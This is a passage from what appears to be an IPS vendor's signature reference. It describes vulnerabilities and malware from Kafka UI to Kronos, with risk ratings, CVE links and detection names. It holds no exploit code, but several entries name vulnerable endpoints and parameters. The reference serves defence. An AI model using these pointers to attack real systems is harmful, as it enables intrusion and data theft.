About this vulnerability: An attempt to exploit a vulnerability in JunOS detected
Risk: High
First detected in: sgpkg-ips-1521-5242
Last changed: sgpkg-ips-1521-5242
Platform: Junos OS
Software: <os>
Type: Cross-site Scripting
Description: The vulnerability is caused by the insecure use of the server name from the URI when generating the error page. It can be exploited by a remote unauthenticated attacker to steal JunOS admin sessions, or be used in combination with other vulnerabilities that require authentication.
Situation: HTTP_CSU_Junos-Pre-Authenticated-Reflected-XSS-On-Error-Page-CVE-2022-22242
References:
CVE-2022-22242
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22242
Back to top

Kafka-UI-Remote-Code-Execution-CVE-2023-52251

About this vulnerability: A vulnerability in Kafka UI
Risk: High
First detected in: sgpkg-ips-1681-5242
Last changed: sgpkg-ips-1681-5242
Platform: Generic
Software: Kafka UI
Type: Input Validation
Description: A remote code execution vulnerability has been reported in Kafka UI. The vulnerability is due to the lack of input validation of the q parameter in HTTP requests submitted to the messages endpoint.
Situation: HTTP_CRL-Kafka-UI-Remote-Code-Execution-CVE-2023-52251
References:
CVE-2023-52251
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-52251
Back to top

KaiXin-Exploit-Kit

About this vulnerability: KaiXin Exploit Kit
Risk: High
First detected in: sgpkg-ips-1019-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: KaiXin is an exploit kit which has been known to target Asian web sites.
Situation: File-Text_KaiXin-Exploit-Kit-Landing-Page
Back to top

Kaltura-getUserzoneCookie-Code-Execution

About this vulnerability: A vulnerability in Kaltura Community Edition
Risk: Moderate
First detected in: sgpkg-ips-1032-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Kaltura Community Edition
Type: Malfunction
Description: There exists a remote code execution vulnerability in the Kaltura platform. A remote, unauthenticated user can use this to execute arbitrary code under the context of the web server user.
Situation: HTTP_CRL-Kaltura-getUserzoneCookie-Code-Execution
References:
CVE-2017-14143
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14143
BID-100976
http://www.securityfocus.com/bid/100976
Back to top

Kaltura-Remote-PHP-Code-Execution

About this vulnerability: A vulnerability in Kaltura Community Edition
Risk: Moderate
First detected in: sgpkg-ips-1032-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Kaltura Community Edition
Type: Malfunction
Description: There exists a remote code execution vulnerability in the Kaltura platform. A remote, unauthenticated user can use this to execute arbitrary code under the context of the web server user.
Situation: HTTP_CRL-Kaltura-Remote-PHP-Code-Execution
Back to top

Kame-Ike-Racoon-Hash

About this vulnerability: A vulnerability in NetBSD Project NetBSD
Risk: Moderate
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-1296-5242
Platform: NetBSD
Software: <os>
Type: Malfunction
Description: The IKE daemon of some BSD systems (OpenBSD's isakmpd, NetBSD's raccoon) has a vulnerability where sending specifically crafted IKE packets could remove an IPsec SA or all SAs. Once an attacker successfully executes an exploit, the ISAKMP SA(s) on the target will be removed. Moreover, a malicious attacker could successfully force the VPN gateway server to remove the SA of the peer and thus force both sides to try and re-establish the connection.
Situation: Generic_Kame-Ike-Racoon-Hash
References:
CVE-2004-0164
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0164
BID-9417
http://www.securityfocus.com/bid/9417
BID-9416
http://www.securityfocus.com/bid/9416
Back to top

Kame-Racoon-X509-Certificate-Verification

About this vulnerability: A vulnerability in Kame Project racoon
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: KAME racoon
Type: Malfunction
Description: The IKE daemon of KAME racoon has a vulnerability where an invalid X.509 certificate will be accepted as valid. This would allow an invalid certificate to be used to establish a security association with a KAME based VPN end-point. Once an attacker successfully executes an exploit, it is possible for the remote attacker to establish a trusted, secure connection with the target, over which traffic can be tunnelled to internal, unprotected systems.
Situation: Generic_UDP-Kame-Racoon-X509-Certificate-Verification
References:
CVE-2004-0607
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0607
BID-10546
http://www.securityfocus.com/bid/10546
OSVDB-7113
http://www.osvdb.org/7113
Back to top

Karjasoft-Sami-FTP-Server-2.0.1-Username-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in KarjaSoft FTP Server 2.0.1
Risk: High
First detected in: sgpkg-ips-642-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: KarjaSoft Sami FTP Server
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in KarjaSoft FTP Server 2.0.1 and earlier. When an oversized username is given with the USER command, a buffer overflow occurs. If successfully exploited, the attacker can execute arbitrary commands on the server.
Situation: FTP_CS-Oversized-User-Buffer-Overflow
References:
CVE-2006-0441
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0441
BID-16370
http://www.securityfocus.com/bid/16370
Back to top

Karjasoft-Sami-FTP-Server-2.0.2-Username-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in KarjaSoft FTP Server 2.0.2
Risk: High
First detected in: sgpkg-ips-643-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: KarjaSoft Sami FTP Server
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in KarjaSoft FTP Server 2.0.2. When an oversized username, or password, is given a buffer overflow occurs. If successfully exploited, the attacker can execute arbitrary commands on the server.
Situation: FTP_CS-Oversized-User-Buffer-Overflow
References:
CVE-2006-2212
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2212
BID-17835
http://www.securityfocus.com/bid/17835
OSVDB-25670
http://www.osvdb.org/25670
Back to top

Karjasoft-Sami-FTP-Server-List-Command-Buffer-Overflow

About this vulnerability: A vulnerability in KarjaSoft Sami FTP Server
Risk: Moderate
First detected in: sgpkg-ips-546-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: KarjaSoft Sami FTP Server
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Karjasoft Sami FTP Server. The vulnerability is caused by insufficient bounds checking while processing LIST command. By sending a crafted message to the target server, a remote unauthenticated attacker can exploit this vulnerability to execute arbitrary code with the privileges of the vulnerable server.
Situation: FTP_CS-Karjasoft-Sami-FTP-Server-List-Command-Buffer-Overflow
References:
BID-58247
http://www.securityfocus.com/bid/58247
OSVDB-90815
http://www.osvdb.org/90815
Back to top

Kaseya-VSA-Arbitrary-File-Upload

About this vulnerability: A Kaseya VSA Arbitrary File Upload vulnerability
Risk: High
First detected in: sgpkg-ips-776-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Kaseya VSA
Type: Misconfiguration
Description: A vulnerability in Kaseya VSA, versions 7 through 9.1, which allows remote attackers to upload ASP files to arbitrary directories leading to arbitrary code execution.
Situation: HTTP_CSU-Kaseya-VSA-Arbitrary-File-Upload
References:
CVE-2015-6922
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6922
Back to top

Kaseya-VSA-SQL-Injection-Vulnerability-CVE-2017-18362

About this vulnerability: An attempt to exploit a vulnerability in Kaseya VSA detected
Risk: High
First detected in: sgpkg-ips-1599-5242
Last changed: sgpkg-ips-1599-5242
Platform: Generic
Software: Kaseya VSA
Type: SQL Injection
Description: ConnectWise ManagedITSync integration through 2017 for Kaseya VSA is vulnerable to unauthenticated remote commands that allow full direct access to the Kaseya VSA database. If the "ManagedIT.asmx" page is available via the Kaseya VSA web interface, anyone with access to the page is able to run arbitrary SQL queries, both read and write, without authentication.
Situation: HTTP_CRL-Kaseya-VSA-SQL-Injection-Vulnerability-CVE-2017-18362
References:
CVE-2017-18362
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18362
Back to top

Kaskad-Dasever-Heap-Overflow

About this vulnerability: A vulnerability in Kaskad Scada
Risk: High
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Kaskad Scada
Type: Buffer Overflow
Description: There is a heap buffer overflow vulnerability in in Kaskad Scada which allows remote attacker to execute malicious code on target system.
Situation: Generic_UDP-Kaskad-Dasever-Heap-Overflow
Back to top

Kaspersky-Anti-Virus-For-Linux-File-Server-Getreportstatus-Directory-Traversal

About this vulnerability: A vulnerability in Kaspersky Labs Anti-Virus for Linux File Servers
Risk: Moderate
First detected in: sgpkg-ips-947-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Kaspersky Labs Anti-Virus for Linux File Servers
Type: Directory Traversal
Description: Improper validation of HTTP requests causes a directory traversal vulnerability in Kaspersky Anti-Virus for Linux File Server. A successful attack allows arbitrary files on the target system to be accessed remotely without authentication.
Situation: HTTP_CRL-Kaspersky-Anti-Virus-For-Linux-File-Server-Getreportstatus-Directory-Traversal
References:
CVE-2017-9812
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9812
Back to top

Kaspersky-Internet-Security-HTTPS-Inspection-Insecure-Certificate-Validation

About this vulnerability: A vulnerability in Kaspersky Labs Internet Security
Risk: High
First detected in: sgpkg-ips-709-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Kaspersky Labs Internet Security
Type: Directory Traversal
Description: There exists a vulnerability in Kaspersky Internet Security. A remote attacker can use this to accieve a directory traversal situation which can lead to code execution.
Situation: HTTPS_SS-Kaspersky-Internet-Security-HTTPS-Inspection-Insecure-Certificate-Validation
Back to top

Katello-Update-Roles-Missing-Authorization

About this vulnerability: A Katello Update Roles Missing Authorization vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Katello
Type: Insecure Configuration
Description: A vulnerability in Katello, versions 1.5.0-14 and earlier, where authorization for the update_roles action is not checked, which allows remote attackers to gain privileges by setting a user account to an administrator account.
Situation: HTTP_CRL-Katello-Update-Roles-Missing-Authorization
References:
CVE-2013-2143
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2143
Back to top

Keenvalue

About this vulnerability: KeenValue
Risk: Low
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: KeenValue
Type: Misconfiguration
Description: KeenValue is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: HTTP_CSU-Keenvalue
HTTP_CSH-Keenvalue
Back to top

Kelihos-Botnet

About this vulnerability: Kelihos botnet
Risk: High
First detected in: sgpkg-ips-571-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Kelihos is a malicious botnet. The botnet primarily downloads malicious modules to send email spam and is thus considered one of the largest spam-sending botnets. However, Kelihos may download any arbitrary malicious module at any time and imposes a high security risk. Kelihos bots organize in peer-to-peer botnets, which are highly resilient due to the lack of single-point-of-failures.
Situation: HTTP_CS-Kelihos-Traffic
HTTP_CSU-Kelihos-Bot-Activity
HTTP_CSH-Kelihos-Bot-Activity
Back to top

Kemoge-Botnet

About this vulnerability: Kemoge botnet
Risk: High
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-1296-5242
Platform: Android
Software: <os>
Type: Remote Control
Description: Kemoge is a malware that targets Andoird hosts.
Situation: HTTP_CRL-Kemoge-Traffic
Back to top

Kentico-CMS-Staging-SyncServer-Remote-Command-Execution

About this vulnerability: A vulnerability in Kentico CMS
Risk: High
First detected in: sgpkg-ips-1254-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Kentico CMS
Type: Input Validation
Description: There exists a vulnerability in Kentico CMS, versions 12.0.14 and before, which allows remote attackers to execute arbitrary commands via unauthenticated XML requests to the Staging Service SyncServer.asmx interface ProcessSynchronizationTaskData method stagingTaskData parameter.
Situation: HTTP_CRL-Kentico-CMS-Staging-SyncServer-Remote-Command-Execution
References:
CVE-2019-10068
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10068
Back to top

Kerberos-Authentication-Failed

About this vulnerability: Kerberos authentication failure
Risk: Low
First detected in: sgpkg-ips-236-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Failed Login
Description: Kerberos authentication failed. Large numbers of failed logins originating from the same network host may indicate password brute force attacks. Also certain services lock user accounts after a predefined number of failed login attempts, allowing remote attackers to cause a denial of service for users by repeated login attempts.
Situation: Generic_Kerberos-Authentication-Failed
Back to top

Kerberos-Cross-Realm-Referrals-KDC-Null-Pointer-Dereference-Denial-Of-Service

About this vulnerability: A vulnerability in MIT Kerberos
Risk: High
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MIT Kerberos
Type: Malfunction
Description: A denial of service vulnerability has been reported in Kerberos. The vulnerability is due to a NULL pointer dereference within the "process_tgs_req()" function because an unusual failure condition causes a helper function to return success. A remote authenticated attacker can exploit this vulnerability by sending an unusual but valid TGS-REQ to a KDC serving a realm with a single-component name.
Situation: Generic_CS-Kerberos-Cross-Realm-Referrals-KDC-Null-Pointer-Dereference-Denial-Of-Service
Generic_UDP-Kerberos-Cross-Realm-Referrals-KDC-Null-Pointer-Dereference-Denial-Of-Service
References:
CVE-2013-1417
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1417
OSVDB-100077
http://www.osvdb.org/100077
Back to top

Kerberos-Multi-Realm-KDC-Null-Pointer-Dereference-Denial-Of-Service

About this vulnerability: A vulnerability in MIT Kerberos
Risk: Moderate
First detected in: sgpkg-ips-553-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MIT Kerberos
Type: Input Validation
Description: A denial of service vulnerability has been reported in Kerberos. The vulnerability is due to a NULL pointer dereference within the setup_server_realm() function when Kerberos is configured to serve multiple realms. A remote attacker can exploit this vulnerability by sending a malicious request to a vulnerable installation of Kerberos. Successful exploitation will cause the krb5kdc daemon to terminate resulting in a denial of service condition.
Situation: Generic_CS-Kerberos-Multi-Realm-KDC-Null-Pointer-Dereference-Denial-Of-Service
Generic_UDP-Kerberos-Multi-Realm-KDC-Null-Pointer-Dereference-Denial-Of-Service
References:
CVE-2013-1418
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1418
OSVDB-99508
http://www.osvdb.org/99508
Back to top

Kerio-Control-Crlf-Injection-CVE-2024-52875

About this vulnerability: An attempt to exploit a vulnerability in Kerio Control detected
Risk: High
First detected in: sgpkg-ips-1837-5242
Last changed: sgpkg-ips-1837-5242
Platform: Generic
Software: Kerio Control
Type: Input Validation
Description: An issue was discovered in GFI Kerio Control 9.2.5 through 9.4.5. The "dest" parameter passed to the "/nonauth/addCertException.cs", "/nonauth/guestConfirm.cs" and "/nonauth/expiration.cs" pages is not properly sanitized before being used to generate a Location HTTP header in a 302 HTTP response. This can be exploited to perform Open Redirect or HTTP Response Splitting attacks, which in turn lead to Reflected Cross-Site Scripting (XSS). Remote command execution can be achieved by leveraging the upgrade feature in the admin interface.
Situation: HTTP_CSU-Kerio-Control-Crlf-Injection-CVE-2024-52875
References:
CVE-2024-52875
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-52875
Back to top

Kerio-Personal-Firewall-Buffer-Overflow

About this vulnerability: Stack buffer overflow in Kerio Personal Firewall administration authentication process
Risk: High
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000 SP4;Windows XP SP0;Windows XP SP1
Software: Kerio Personal Firewall
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability in Kerio Personal Firewall authentication process which allows a remote attacker to execute arbitrary code via a handshake packet.
Situation: Generic_CS-Kerio-Personal-Firewall-Buffer-Overflow
References:
CVE-2003-0220
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0220
BID-7180
http://www.securityfocus.com/bid/7180
OSVDB-6294
http://www.osvdb.org/6294
Back to top

KeyBase-Keylogger-C2-Traffic

About this vulnerability: Traffic resembling KeyBase keylogger was detected
Risk: High
First detected in: sgpkg-ips-1053-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: KeyBase keylogger traffic was detected. KeyBase is a keylogger malware family, which features are mainly limited to keylogging and password stealing.
Situation: HTTP_CSU-KeyBase-Keylogger-C2-Traffic
Back to top

Keysight-N6854a-And-N6841a-RF-Addlicensefile-Directory-Traversal

About this vulnerability: A vulnerability in KeySight N6854A and N6841A RF
Risk: High
First detected in: sgpkg-ips-1520-5242
Last changed: sgpkg-ips-1520-5242
Platform: Generic
Software: KeySight N6854A and N6841A RF
Type: Directory Traversal
Description: A directory traversal exists in KeySight N6854A and N6841A RF Sensor. The vulnerability is due to input validation error which results in upload of malicious files at arbitrary locations on the target server. A remote, unauthenticated attacker can exploit this vulnerability by sending maliciously crafted packets to the target server. Successful exploitation could result in execution of arbitrary code on the target server in the context of SYSTEM.
Situation: File-Binary_Keysight-N6854a-And-N6841a-RF-Addlicensefile-Directory-Traversal
References:
CVE-2022-38129
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38129
Back to top

Keysight-N6854a-And-N6841a-RF-Sensor-Directory-Traversal

About this vulnerability: A vulnerability in KeySight N6854A and N6841A RF
Risk: High
First detected in: sgpkg-ips-1478-5242
Last changed: sgpkg-ips-1478-5242
Platform: Generic
Software: KeySight N6854A and N6841A RF
Type: Directory Traversal
Description: A directory traversal vulnerability exists in KeySight N6854A and N6841A RF Sensor. This vulnerability is due to incomplete input sanitization in Java class UserFirmwareRequestHandler. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted request. Successful exploitation could read arbitrary files on the target server under the security context of the SYSTEM.
Situation: HTTP_CSU-Keysight-N6854a-And-N6841a-RF-Sensor-Directory-Traversal
References:
CVE-2022-1661
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1661
Back to top

Keysight-N6854a-And-N6841a-RF-Sensor-Insecure-Deserialization

About this vulnerability: A vulnerability in KeySight N6854A and N6841A RF
Risk: Moderate
First detected in: sgpkg-ips-1476-5242
Last changed: sgpkg-ips-1476-5242
Platform: Generic
Software: KeySight N6854A and N6841A RF
Type: Input Validation
Description: Insecure deserialization of Java objects causes a vulnerability in the KeySight N6854A and N6841A RF Sensor. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CS-Keysight-N6854a-And-N6841a-RF-Sensor-Insecure-Deserialization
References:
CVE-2022-1660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1660
Back to top

Keysight-N6854a-And-N6841a-RF-Sensor-smsRestoreDatabaseZip-SQL-Injection

About this vulnerability: A vulnerability in KeySight N6854A and N6841A RF Sensor.
Risk: High
First detected in: sgpkg-ips-1527-5242
Last changed: sgpkg-ips-1527-5242
Platform: Windows
Software: KeySight N6854A and N6841A RF
Type: Input Validation
Description: A vulnerability in KeySight N6854A and N6841A RF Sensor, versions 2.4.0 and before, which allows remote attackers to execute arbitrary code by sending maliciously crafted packets to the target server due to insufficient input validation when restoring databases from arbitrary network locations.
Situation: HTTP_CRL-Keysight-N6854a-And-N6841a-RF-Sensor-smsRestoreDatabaseZip-SQL-Injection
References:
CVE-2022-38130
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38130
Back to top

Kibana-Upgrade-Assistant-Telemetry-Collector-Prototype-Pollution

About this vulnerability: A vulnerability in Elastic Kibana detected
Risk: High
First detected in: sgpkg-ips-1652-5242
Last changed: sgpkg-ips-1652-5242
Platform: Generic
Software: ElasticSearch
Type: Input Validation
Description: A vulnerability in Elastic Kibana, before before version 7.6.3, which allows remote attackers to execute arbitrary code by setting a new constructor.prototype.sourceURL value.
Situation: HTTP_CRL-Kibana-Upgrade-Assistant-Telemetry-Collector-Prototype-Pollution
Back to top

KillDisk-Binary-File

About this vulnerability: KillDisk binary file was detected
Risk: High
First detected in: sgpkg-ips-1080-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Killdisk is a disk wiping malware. First, it scrambles found files and then deletes them. After deleting the files, boot records are overwritten to make disk partitions unusable. This situation might be also triggered by other malicious executables.
Situation: File-Exe_KillDisk-Malware-Binary-File
Back to top

Kingsoft-WPS-Office-Path-Traversal-CVE-2024-7262

About this vulnerability: A vulnerability in Kingsoft WPS Office
Risk: High
First detected in: sgpkg-ips-1784-5242
Last changed: sgpkg-ips-1784-5242
Platform: Windows
Software: Kingsoft WPS Office
Type: Input Validation
Description: A path traversal vulnerability in Kingsoft WPS Office allows loading of arbitrary Windows libraries. An unauthenticated attacker can leverage this vulnerability for remote code execution by enticing a user into clicking a link in a maliciously crafted document.
Situation: File-Text_Kingsoft-WPS-Office-Path-Traversal-CVE-2024-7262
File-TextId_Kingsoft-WPS-Office-Path-Traversal-CVE-2024-7262
References:
CVE-2024-7262
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7262
Back to top

Kingsoft-Writer-Font-Names-Buffer-Overflow

About this vulnerability: A vulnerability in Beijing Kingsoft Kingsoft Writer
Risk: High
First detected in: sgpkg-ips-560-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Kingsoft Writer
Type: Buffer Overflow
Description: A code execution vulnerability has been reported in Kingsoft Writer. The vulnerability is due to an error while handling font names in WPS or Office word files. A remote attacker can exploit this vulnerability by enticing an unsuspecting user to download and process a malicious file with a vulnerable version of the application. This can lead to code execution in the context of the affected user.
Situation: File-OLE_Kingsoft-Writer-Font-Names-Buffer-Overflow
References:
CVE-2013-3934
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3934
BID-61796
http://www.securityfocus.com/bid/61796
OSVDB-96312
http://www.osvdb.org/96312
Back to top

Kinsing-Linux-Trojan-Infection-Traffic

About this vulnerability: Kinsing trojan infection traffic detected
Risk: High
First detected in: sgpkg-ips-1354-5242
Last changed: sgpkg-ips-1354-5242
Platform: Linux
Software: <os>
Type: Backdoor
Description: Kinsing trojan infection traffic detected.
Situation: HTTP_CRH-Kinsing-Linux-Trojan-Infection-Traffic
Back to top

Klog-Server-authenticate.php-User-Unauthenticated-Command-Injection

About this vulnerability: An attempt to exploit a vulnerability in Klog Server
Risk: High
First detected in: sgpkg-ips-1338-5242
Last changed: sgpkg-ips-1338-5242
Platform: Linux
Software: Klog Server
Type: Input Validation
Description: There exists a vulberability in Klog Server, versions 2.4.1 and prior, which allows remote attackers to execute arbitrary code via the user parameter in a POST to authenticate.php, due to insufficient user input validation.
Situation: HTTP_CRL-Klog-Server-authenticate.php-User-Unauthenticated-Command-Injection
References:
CVE-2020-35729
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35729
Back to top

Known-APT-Traffic

About this vulnerability: Traffic pattern associated with Advanced Persisten Threats
Risk: High
First detected in: sgpkg-ips-1007-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: This vulnerability refers to a number of situations that detect traffic patterns associated with Advanced Persistent Threats (APT's).
Situation: HTTP_CS-Suspected-APT-Traffic-Pattern
HTTP_CSU-Suspected-APT-Traffic-Pattern
HTTP_CRL-Suspected-APT-Traffic-Pattern
SMB-TCP_CS_Suspected-APT-Traffic-Pattern
SMB-TCP_SHS-NTLM-Authentication-Usage
Back to top

Known-Phishing-Word-Documents

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Word detected
Risk: High
First detected in: sgpkg-ips-1806-5242
Last changed: sgpkg-ips-1806-5242
Platform: Windows
Software: Microsoft Word
Type: Input Validation
Description: In a recent phishing campaign, the attacker abuses Microsofts Word's file recovery feature by sending corrupted Word documents as email attachments. This allows them to bypass security software due to their damaged state but still be recoverable by the application. The documents in this campaign all include the base64 encoded string "IyNURVhUTlVNUkFORE9NNDUjIw". This fingerprint detects such documents.
Situation: File-Name_Known-Phishing-Word-Documents
Back to top

Knox-Arkeia-Network-Backup-Server-Type77-Stack-BOF

About this vulnerability: Buffer overflow in Arkeia Network Backup Server
Risk: High
First detected in: sgpkg-ips-21-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Arkeia Network Backup
Type: Buffer Overflow
Description: Arkeia Network Backup Server contains a stack-based buffer overflow vulnerability caused by insufficient bounds checking when handling type 77 requests. A remote attacker could exploit this to execute arbitrary code on the server.
Situation: Generic_Arkeia-Network-Backup-Server-Type77-Stack-BOF-1
Generic_Arkeia-Network-Backup-Server-Type77-Stack-BOF-2
Generic_Arkeia-Network-Backup-Server-Type77-Stack-BOF-3
Generic_CS-Arkeia-Network-Backup-Server-Buffer-Overflow
References:
CVE-2005-0491
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0491
BID-12594
http://www.securityfocus.com/bid/12594
Back to top

Kodi-Local-File-Inclusion

About this vulnerability: A Kodi Local File Inclusion vulnerability
Risk: High
First detected in: sgpkg-ips-1028-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Linux; Mac OS X; Android
Software: Kodi
Type: Directory Traversal
Description: A vulnerability in Kodi, versions before 17.1, which allows remote attackers to read arbitrary files via the image path in the URI.
Situation: HTTP_URI-Kodi-Local-File-Inclusion
References:
CVE-2017-5982
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5982
Back to top

Kong-Gateway-Admin-API-Remote-Code-Execution

About this vulnerability: A vulnerability in Kong Gateway.
Risk: High
First detected in: sgpkg-ips-1368-5242
Last changed: sgpkg-ips-1368-5242
Platform: Linux; OS X
Software: Kong Gateway
Type: Input Validation
Description: A vulnerability in Kong Gateway which allows remote attackers to execute arbitrary commands by allowing the creation of a route and serverless function plugin which is used to run the command using os.execute().
Situation: HTTP_CRL-Kong-Gateway-Admin-API-Remote-Code-Execution
Back to top

Konica-Minolta-FTP-Utility-Directory-Traversal

About this vulnerability: A Konica Minolta FTP Utility Directory Traversal vulnerability
Risk: High
First detected in: sgpkg-ips-774-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Konica Minolta FTP Utility
Type: Directory Traversal
Description: A vulnerability in Konica Minolta FTP Utility, version 1.0, which allows remote attackers to read arbitrary files via a ../ directory traversal in the RETR command.
Situation: FTP_CS-Attempted-FTP-Directory-Traversal
References:
CVE-2015-7603
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7603
Back to top

Konqueror-FTP-Iframe-Null-Pointer-Dereference-DoS

About this vulnerability: Konqueror FTP Iframe Null Pointer Dereference DoS vulnerability.
Risk: High
First detected in: sgpkg-ips-671-5211
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: Konqueror
Type: Browser
Description: A vulnerability exists in Konqueror in KDE 3.5.5 which allows remote attackers to cause a denial of service condition by setting the src attribute of an iframe to an ftp:// URL.
Situation: File-Text_Konqueror-FTP-Iframe-Null-Pointer-Dereference-DoS
References:
CVE-2007-1308
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1308
BID-22814
http://www.securityfocus.com/bid/22814
OSVDB-34084
http://www.osvdb.org/34084
Back to top

Konqueror-Same-Origin-Policy-Bypass

About this vulnerability: Cross-site scripting vulnerability in Konqueror
Risk: Moderate
First detected in: sgpkg-ips-156-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Konqueror
Type: Cross-site Scripting
Description: There is a cross site scripting vulnerability in Konqueror. The vulnerability allows bypassing of the same origin policy enforced by the browser, leading to unauthorized access to sensitive information of another web site such as authentication cookies.
Situation: HTTP_SS-Same-Origin-Policy-Bypass
File-Text_Same-Origin-Policy-Bypass
References:
CVE-2002-1151
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1151
BID-5689
http://www.securityfocus.com/bid/5689
OSVDB-7867
http://www.osvdb.org/7867
Back to top

Koobface-Bot

About this vulnerability: Koobface Bot
Risk: High
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Koobface is a worm that tries to collect login information for various sites from the infected machine.
Situation: HTTP_CSU-Koobface-Bot-Traffic
Back to top

Korenix-Jetwave-Command-Injection-CVE-2023-23294

About this vulnerability: A vulnerability in Korenix JetWave
Risk: High
First detected in: sgpkg-ips-1650-5242
Last changed: sgpkg-ips-1650-5242
Platform: Generic
Software: Korenix JetWave
Type: Input Validation
Description: A command injection vulnerability has been reported in the firmware of Korenix JetWave 4200 Series 1.3.0 and JetWave 3000 Series 1.6.0 wireless access points. An authenticated attacker can use this vulnerability to execute arbitrary OS commands via a maliciously crafted file_name parameter value.
Situation: HTTP_CRL-Korenix-Jetwave-Command-Injection-CVE-2023-23294
References:
CVE-2023-23294
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23294
Back to top

KPOT-Stealer-Traffic

About this vulnerability: KPOT Stealer traffic
Risk: High
First detected in: sgpkg-ips-1254-5242
Last changed: sgpkg-ips-1758-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: KPOT is an information stealer malware.
Situation: HTTP_CS-KPOT-Stealer-Traffic
Back to top

Kramer-Viaware-Remote-Code-Execution-CVE-2021-35064

About this vulnerability: A vulnerability in Kramer VIAware
Risk: High
First detected in: sgpkg-ips-1532-5242
Last changed: sgpkg-ips-1532-5242
Platform: Generic
Software: VIAware
Type: Misconfiguration
Description: A remote code execution vulnerability has been reported in the Kramer VIAware software. A successful exploitation of this vulnerability can allow an unauthenticated attacker to gain root privileges due to a sudoers misconfiguration.
Situation: HTTP_CRL-Kramer-Viaware-Remote-Code-Execution-CVE-2021-35064
References:
CVE-2021-35064
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35064
Back to top

Kronos-Botnet

About this vulnerability: Kronos botnet
Risk: High
First detected in: sgpkg-ips-760-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
